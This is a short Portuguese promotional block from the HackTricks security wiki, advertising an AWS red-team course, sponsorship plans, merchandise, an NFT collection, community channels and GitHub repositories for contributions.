Aprenda hacking na AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)! Outras maneiras de apoiar o HackTricks: * Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)! * Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com) * Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) * **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.